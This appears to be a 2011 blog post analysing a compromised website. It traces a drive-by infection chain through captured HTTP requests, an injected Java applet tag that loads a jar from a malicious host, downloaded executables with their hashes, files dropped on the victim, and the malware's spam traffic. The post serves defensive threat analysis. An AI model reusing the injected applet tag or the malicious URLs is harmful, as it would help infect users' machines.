John has informed us about a new possible website infected:
hxxp://www.knowmore. org |
A fast scan with vscan.urlvoid.com report that the site is infected:
Report 2011-03-19 01:20:31 (GMT 1)
File Name knowmore-org
File Size 22121 bytes
File Type Unknown file
MD5 Hash d29b303c72a2330ac13155be0b280221
SHA1 Hash 3cf9d0637551e0ce5ac7a9ce243b35e13caf5e80
Detections: 3 / 9 (33 %)
Status INFECTED
We have dumped the content of the website:
So we have browsed the website in our test environment and this is the result:
GET /count11.php HTTP/1.0 Referer: hxxp://knowmore. org/ Host: maribit. com GET /in.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA== HTTP/1.0 Referer: hxxp://knowmore. org/ Host: kagrinn.cz. cc |
Now there is a try to download a java applet:
<applet code='lort.cooter.class' archive='hxxp://kagrinn.cz. cc/efrthyjkfyiguytdsfsxz.jar' width='300' height='150'> |
New network traffic:
GET /out.php?a=QQkFBg0DBwYNAwwFEkcJBQYNDAYMAwQNAA==&p=6 HTTP/1.0 Host: kagrinn.cz. cc |
Response:
HTTP/1.1 200 OK Server: nginx/0.8.54 Date: Sat, 19 Mar 2011 00:54:42 GMT Content-Type: application/octet-stream Connection: keep-alive X-Powered-By: PHP/5.3.5 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Accept-Ranges: bytes Content-Length: 17920 Content-Disposition: inline; filename=setup.exe MZ............. |
Is downloaded the executable file setup.exe:
Report date: 2011-03-19 02:21:05 (GMT 1)
File name: setup.exe
File size: 17920 bytes
MD5 hash: 192b0b0d37d3a6666b584e876ca271e5
SHA1 hash: 7ca0e9f10a3cef8a7cc8b7831f675bd7089648f4
Detection rate: 0 on 9 (0%)
Another executable file is downloaded:
GET /client1.exe HTTP/1.0 Host: tamarer. com HTTP/1.1 200 Server: Apache Content-Length: 650240 Content-Type: Last-Modified: Sat, 19 Mar 2011 00:55:16 GMT Accept-Ranges: bytes Server:nginx/0.8.34 Date:Fri, 18 Mar 2011 21:54:54 GMT Last-Modified:Sat, 19 Mar 2011 00:52:41 GMT Accept-Ranges:bytes MZ................. |
Files created during the infection:
c:\DOCUME~1\ADMINI~1\IMPOST~1\Temp\setup.exe c:\DOCUME~1\ADMINI~1\IMPOST~1\Temp\MPC5.tmp c:\WINDOWS\Temp\_ex-68.exe c:\WINDOWS\system32\Packet.dll c:\WINDOWS\system32\wpcap.dll c:\WINDOWS\system32\drivers\npf.sys |
Report date: 2011-03-19 02:36:06 (GMT 1)
File name: ex-68-exe
File size: 650240 bytes
MD5 hash: 32f73e995554b8e601c0da661e9a4edb
SHA1 hash: 237cafc9c7c30adee5ac795afd4371fbc19aa41d
Detection rate: 0 on 9 (0%)
Other curious network traffic:
GET /FlopK4F8XFP3oZ1PmQ.htm HTTP/1.1 Host: 98.232.48.112 Content-Length: 594 User-Agent: Mozilla/5.0 (X11; U; NetBSD alpha; en-US; rv:1.8) Gecko/20060107 Firefox/1.5 |
Now the malware try to send spam messages:
220 Comendo Mailfence V3 HELO XXX 250 ec3-node2.net.comendo.com says HELO to XXX:53746 MAIL FROM:<xxx@alcatel-lucent.com> 250 MAIL FROM accepted RCPT TO:<xxx@lpmail.com> 250 RCPT TO accepted DATA 354 continue. finished with "\r\n.\r\n" [...] Subject: Bring extra pleasance to your xxx-life! [...] FDA-approved blue-blu-colored med to heal ED! hxxp://healthcontrol. dk/jhkop806.html [...] |
So the spam message contains a http link:
healthcontrol. dk/jhkop806.html |
That redirects to:
pillrxdrugstorechains. at |
URLVoid domains analysis:
http://www.urlvoid.com/scan/kagrinn.cz.cc
http://www.urlvoid.com/scan/knowmore.org
http://www.urlvoid.com/scan/tamarer.com
http://www.urlvoid.com/scan/healthcontrol.dk
http://www.ipvoid.com/scan/98.232.48.112
http://www.urlvoid.com/scan/pillrxdrugstorechains.at